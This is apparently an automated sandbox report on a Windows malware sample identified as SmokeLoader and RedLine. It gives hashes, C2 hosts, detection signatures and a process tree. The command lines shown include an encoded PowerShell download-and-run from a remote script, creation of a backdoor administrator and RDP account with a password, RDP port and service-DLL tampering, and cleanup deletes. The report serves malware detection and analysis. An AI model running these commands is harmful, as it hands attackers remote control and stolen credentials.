Analysis
- max time kernel: 151s
- max time network: 147s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 09-12-2021 16:36
Static task: static1
Behavioral task: behavioral1
- Sample: 4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee.exe
- Resource: win10-en-20211208
General
- Target: 4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee.exe
- Size: 298KB
- MD5: fb74576efd1396c8e6456bbf55736b9d
- SHA1: 106da8bdf7845b3370ddd19b9a8e82add6c069b9
- SHA256: 4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee
- SHA512: 20b479f2887b1a0f3296c13cf8075fbf778a82ba6c7b2f8cf60838f22f1c6192429764a62b396c7dc4a44df4cc1a56a0d0dbd035f54c90c5594c00afe1b4c1b2
Malware Config
Extracted
- URL: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
- Family: smokeloader
- Version: 2020
- C2:
  - http://rcacademy.at/upload/
  - http://e-lanpengeonline.com/upload/
  - http://vjcmvz.cn/upload/
  - http://galala.ru/upload/
  - http://witra.ru/upload/
Extracted
- Family: redline
- C2: 195.133.47.114:38627
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
- resource: behavioral1/memory/1632-123-0x0000000000E80000-0x0000000000EE8000-memory.dmp; yara_rule: family_redline
- resource: C:\Users\Admin\AppData\Local\Temp\4BFA.exe; yara_rule: family_redline
- resource: C:\Users\Admin\AppData\Local\Temp\4BFA.exe; yara_rule: family_redline
- resource: behavioral1/memory/3312-153-0x0000000000B80000-0x0000000000BEC000-memory.dmp; yara_rule: family_redline
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
- flow 95; pid 4488; process powershell.exe
- flow 97; pid 4488; process powershell.exe
- flow 98; pid 4488; process powershell.exe
- flow 99; pid 4488; process powershell.exe
- flow 101; pid 4488; process powershell.exe
- flow 103; pid 4488; process powershell.exe
- flow 105; pid 4488; process powershell.exe
- flow 107; pid 4488; process powershell.exe
- flow 109; pid 4488; process powershell.exe
-
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
Processes:
- pid 1632; process 4003.exe
- pid 700; process 4BFA.exe
- pid 3312; process 6242.exe
- pid 1288; process A901.exe
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
- resource: \Windows\Branding\mediasrv.png; yara_rule: upx
- resource: \Windows\Branding\mediasvc.png; yara_rule: upx
-
Deletes itself 1 IoCs
Processes:
- pid 396 (no process name recorded)
-
Loads dropped DLL 2 IoCs
Processes:
- pid 780 (no process name recorded)
- pid 780 (no process name recorded)
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
- pid 1632; process 4003.exe
- pid 3312; process 6242.exe
-
Drops file in Program Files directory 4 IoCs
Processes:
- File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT (powershell.exe)
- File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI (powershell.exe)
- File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT (powershell.exe)
- File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI (powershell.exe)
-
Drops file in Windows directory 19 IoCs
Processes:
- File created: C:\Windows\branding\wupsvc.jpg (powershell.exe)
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI363.tmp (powershell.exe)
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI374.tmp (powershell.exe)
- File created: C:\Windows\branding\mediasvc.png (powershell.exe)
- File opened for modification: C:\Windows\branding\wupsvc.jpg (powershell.exe)
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI384.tmp (powershell.exe)
- File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat (powershell.exe)
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (powershell.exe)
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1swgrk4x.z4w.ps1 (powershell.exe)
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_wjfrvm0b.g12.psm1 (powershell.exe)
- File created: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP (powershell.exe)
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI353.tmp (powershell.exe)
- File created: C:\Windows\branding\mediasrv.png (powershell.exe)
- File opened for modification: C:\Windows\branding\Basebrd (powershell.exe)
- File opened for modification: C:\Windows\branding\ShellBrd (powershell.exe)
- File opened for modification: C:\Windows\branding\mediasrv.png (powershell.exe)
- File opened for modification: C:\Windows\branding\mediasvc.png (powershell.exe)
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI385.tmp (powershell.exe)
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
- Key queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee.exe)
- Key enumerated: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee.exe)
-
Modifies data under HKEY_USERS 64 IoCs
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
- HTTP User-Agent header; flow 99; ioc: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header; flow 101; ioc: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header; flow 97; ioc: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header; flow 98; ioc: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
- pid 3376; process 4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee.exe (2 entries)
- pid 396; no process name recorded (62 entries)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
- pid 396 (no process name recorded)
-
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
- pid 628 (no process name recorded)
- pid 628 (no process name recorded)
-
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
- pid 3376; process 4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes (token privileges enabled, grouped by pid; 64 entries in total):
- pid 396 (no process name recorded): Token: SeShutdownPrivilege and Token: SeCreatePagefilePrivilege, alternating, 14 entries
- pid 700, 4BFA.exe: Token: SeDebugPrivilege
- pid 2200, powershell.exe: Token: SeDebugPrivilege
- pid 1452, powershell.exe: Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- pid 4528, powershell.exe: Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- pid 3868, powershell.exe: Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege
-
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
- pid 396 (no process name recorded)
- pid 396 (no process name recorded)
-
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
- pid 396 (no process name recorded)
- pid 396 (no process name recorded)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes (source pid/process wrote to memory of target pid/process; repeated rows counted; 64 entries in total):
- PID 396 (no process name recorded) -> 1632 4003.exe (3 entries)
- PID 396 (no process name recorded) -> 700 4BFA.exe (3 entries)
- PID 396 (no process name recorded) -> 3312 6242.exe (3 entries)
- PID 396 (no process name recorded) -> 1288 A901.exe (2 entries)
- PID 1288 A901.exe -> 2200 powershell.exe (2 entries)
- PID 2200 powershell.exe -> 3088 csc.exe (2 entries)
- PID 3088 csc.exe -> 2324 cvtres.exe (2 entries)
- PID 2200 powershell.exe -> 1236 csc.exe (2 entries)
- PID 1236 csc.exe -> 4896 cvtres.exe (2 entries)
- PID 2200 powershell.exe -> 1452 powershell.exe (2 entries)
- PID 2200 powershell.exe -> 4528 powershell.exe (2 entries)
- PID 2200 powershell.exe -> 3868 powershell.exe (2 entries)
- PID 2200 powershell.exe -> 3440 reg.exe (2 entries)
- PID 2200 powershell.exe -> 3376 reg.exe (2 entries)
- PID 2200 powershell.exe -> 4092 reg.exe (2 entries)
- PID 2200 powershell.exe -> 4484 net.exe (2 entries)
- PID 4484 net.exe -> 3808 net1.exe (2 entries)
- PID 2200 powershell.exe -> 3276 cmd.exe (2 entries)
- PID 3276 cmd.exe -> 4292 cmd.exe (2 entries)
- PID 4292 cmd.exe -> 1000 net.exe (2 entries)
- PID 1000 net.exe -> 812 net1.exe (2 entries)
- PID 2200 powershell.exe -> 4228 cmd.exe (2 entries)
- PID 4228 cmd.exe -> 3552 cmd.exe (2 entries)
- PID 3552 cmd.exe -> 1096 net.exe (2 entries)
- PID 1096 net.exe -> 1284 net1.exe (2 entries)
- PID 508 cmd.exe -> 1900 net.exe (2 entries)
- PID 1900 net.exe -> 2368 net1.exe (2 entries)
- PID 2644 cmd.exe -> 3932 net.exe (2 entries)
- PID 3932 net.exe -> 2824 net1.exe (2 entries)
- PID 4744 cmd.exe -> 2600 net.exe (2 entries)
- PID 2600 net.exe -> 4840 net1.exe (1 entry)
Processes
(each entry: image path with its depth in the process tree, the command line, and the signatures triggered by that process)
- C:\Users\Admin\AppData\Local\Temp\4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee.exe (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee.exe"
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
- C:\Users\Admin\AppData\Local\Temp\4003.exe (depth 1)
  Command line: C:\Users\Admin\AppData\Local\Temp\4003.exe
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
- C:\Users\Admin\AppData\Local\Temp\4BFA.exe (depth 1)
  Command line: C:\Users\Admin\AppData\Local\Temp\4BFA.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
- C:\Users\Admin\AppData\Local\Temp\6242.exe (depth 1)
  Command line: C:\Users\Admin\AppData\Local\Temp\6242.exe
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
- C:\Users\Admin\AppData\Local\Temp\A901.exe (depth 1)
  Command line: C:\Users\Admin\AppData\Local\Temp\A901.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    - Drops file in Windows directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (depth 3)
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sspx5pzl\sspx5pzl.cmdline"
      - Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (depth 4)
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC8AB.tmp" "c:\Users\Admin\AppData\Local\Temp\sspx5pzl\CSC53E0BCE51A914CD18F16A05A6216C87B.TMP"
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (depth 3)
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1vyoltyj\1vyoltyj.cmdline"
      - Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (depth 4)
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCE77.tmp" "c:\Users\Admin\AppData\Local\Temp\1vyoltyj\CSC285CBF85822E46DCA078DA8B30FCF1C.TMP"
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\reg.exe (depth 3)
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    - C:\Windows\system32\reg.exe (depth 3)
      Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      - Modifies registry key
    - C:\Windows\system32\reg.exe (depth 3)
      Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    - C:\Windows\system32\net.exe (depth 3)
      Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\net1.exe (depth 4)
        Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - C:\Windows\system32\cmd.exe (depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe (depth 4)
        Command line: cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe (depth 5)
          Command line: net start rdpdr
          - Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net1.exe (depth 6)
            Command line: C:\Windows\system32\net1 start rdpdr
    - C:\Windows\system32\cmd.exe (depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe (depth 4)
        Command line: cmd /c net start TermService
        - Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe (depth 5)
          Command line: net start TermService
          - Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net1.exe (depth 6)
            Command line: C:\Windows\system32\net1 start TermService
    - C:\Windows\system32\cmd.exe (depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    - C:\Windows\system32\cmd.exe (depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe user WgaUtilAcc 000000 /del
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe user WgaUtilAcc 000000 /del
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe user WgaUtilAcc sJEwQSBt /add
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe user WgaUtilAcc sJEwQSBt /add
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc sJEwQSBt /add
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe user WgaUtilAcc sJEwQSBt
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe user WgaUtilAcc sJEwQSBt
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc sJEwQSBt
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd.exe /C wmic path win32_VideoController get name
  - C:\Windows\System32\Wbem\WMIC.exe (depth 2)
    Command line: wmic path win32_VideoController get name
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd.exe /C wmic CPU get NAME
  - C:\Windows\System32\Wbem\WMIC.exe (depth 2)
    Command line: wmic CPU get NAME
    - Modifies data under HKEY_USERS
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - C:\Windows\system32\cmd.exe (depth 2)
    Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      - Blocklisted process makes network request
      - Drops file in Program Files directory
      - Drops file in Windows directory
      - Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads